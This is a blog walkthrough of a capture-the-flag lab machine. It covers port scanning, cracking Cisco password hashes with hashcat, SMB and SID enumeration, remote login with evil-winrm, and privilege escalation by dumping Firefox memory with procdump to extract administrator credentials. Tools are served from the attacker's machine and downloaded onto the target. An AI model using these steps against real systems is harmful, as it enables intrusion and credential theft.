top of page



As usual, let's start with nmap:

nmap -sV -sC -p-

Open browser and go to

Click on Login as guest

Click on Attachment

Notice that the conversation was started by user Hazard

Looks like we may have found some credentials.

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Let's do some password cracking. If we google password cracking type 7, we find a useful website called



Finally, we want to crack $1$pdQG$o8nrSzsGXeaduXrjlvKc91

To do that let's use hashcat

Go to Downloads folder for instance and create a new text file here called hashed.txt file and copy paste your hash in it using the nano command

Now run:

hashcat -m 500  hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Wait until it finishes the initialization:

When the initialization is done you should get the following:

Type s to get the status

This might take a few minutes. It tells us below estimated time is 21 minutes. Just wait.

After a few minutes we get the password: stealth1agent


Hashcat assigns each algorithm a number or "hash mode". MD5 was assigned the hash mode 0 for instance.

-m 0 This advises hashcat that we are going to crack md5 passwords.



-m 500 is for 500md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)2



there are many different numbers, check out here full list:

Now let's turn to SMB. port 445 is open which is SMB.

smbclient -L
SMB authentication always require a username. If you don't specify one, it will use your VM username as default. When prompted to enter a password, just press enter.

Ok that didn't work, we were not able to get a list of the shares available.

Recap on credentials found so far:









smbclient -L -U hazard

For the password, I tried all the password we found above and stealth1agent worked!

I checked all the shares available but access is denied

smbclient \\\\\\ADMIN$ -U hazard
smbclient \\\\\\C$ -U hazard
smbclient \\\\\\IPC$ -U hazard

Now we do have the credentials for one of the user



Let's use something called from impacket. This might help us enumerate more users.

locate lookupsid

The one we need is:


cd /usr/share/doc/python3-impacket/examples


This tells us that we need to use the following format:

python3 username:password@targetIP
python3 Hazard:stealth1agent@

There is another user called chase


Let's use evil-winrm (winrm for windows remote management)

First we need to install it.

Open a brand new command prompt and type the following commands:

First we need to install the dependencies:

sudo gem install winrm winrm-fs stringio

Now we need to install git:

sudo apt install git

We need to clone this git

sudo git clone

Now let's change directory

cd evil-winrm

Now we can connect to the target using:

./evil-winrm.rb -i -u chase 

when prompted for the password enter:


we are in!

cd C:\Users\Chase\Desktop
cat user.txt


Congratulations! You got the flag!

Note that there is also a todo.txt on the desktop

cat todo.txt

Now let's look for the root flag

cd C:\Users\Administrator

Access is denied. So we need to escalate our privileges.

Privilege Escalation

Let's see what processes are running:


ps stand for Process Status

get-process firefox

Perhaps Chase is using Firefox to login to the Issues portal? We have control over the process so we could potentially do a process dump and perhaps find some passwords in it?

Let's use procdump. It can be used to dump process memory. From your VM, go to and click on Download ProcDump

Once downloaded to your VM, open a new command prompt and type:

cd Downloads


We now have procdump64.exe in our Downloads folder

From this Downloads folder, we are going to create a small webserver on our VM using:

sudo python3 -m http.server 8080
Make sure you stay in the Downloads folder

Now we have created a web service on our VM on port 8080

Do not close this window! Otherwise your webservice will be shutdown

Let's check that our web server is working by opening our web browser and type:

The IP of my VM is, yours will be different. If you don't know the IP of your VM, open a new command prompt and type ifconfig

OK now that our web service is working, we are going to get the target machine to go to and retrieve procdump64.exe

To do that, go back to the target machine. Make sure you are C:\Users\Chase\Desktop using:

cd C:\Users\Chase\Desktop

Now let's go get procdump64.exe from our web server

wget "" -outfile "procdump64.exe"


We successfully downloaded procdump64.exe to the target machine!

get-process firefox

I am now going to pick one of the process ID, here I am picking the first one below, with process ID 380. Your process ID will be different.

I want to create a process dump of the process ID 380 (Firefox). To do that I am using the following command:

 .\procdump64.exe -ma 380 firefox.dmp

-ma flag is used to dump the entire memory of the Firefox process

firefox.dmp will be the name of my dump file

The first time you use this software you need to accept the eula by adding -accepteula

.\procdump64.exe -ma 380 firefox.dmp -accepteula


Now that we have the dump, we need to download strings.exe

Click on Download Strings

cd Downloads
ls has been downloaded to your VM


Type n and enter


strings.exe is now in our Downloads folder, meaning that is is also still on our web server:

Now we need to get strings.exe downloaded onto the target machine. To do this, go back to the target machine and type:

wget "" -outfile "strings.exe"


Great! srings.exe is now on the target machine.

We are going to use strings.exe to search in the dump file (firefox.dmp) for any strings that have the word "password" in it. The idea is to find the password for administrator in the Firefox dump.

To do that, type:

./strings.exe firefox.dmp | findstr /i password

This will take a while

We find the following credentials in the dump:



Now that we have the credentials for the administrator account, we can use evil-winrm again, but this time login as administrator. From your VM, open a new command prompt window and type:

cd Downloads
cd evil-winrm

./evil-winrm -i -u administrator

Enter the password:


We are in!

cd C:\Users\Administrator\Desktop

cat root.txt


Congratulations! You got the root flag!

157 views0 comments

Recent Posts

See All





Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page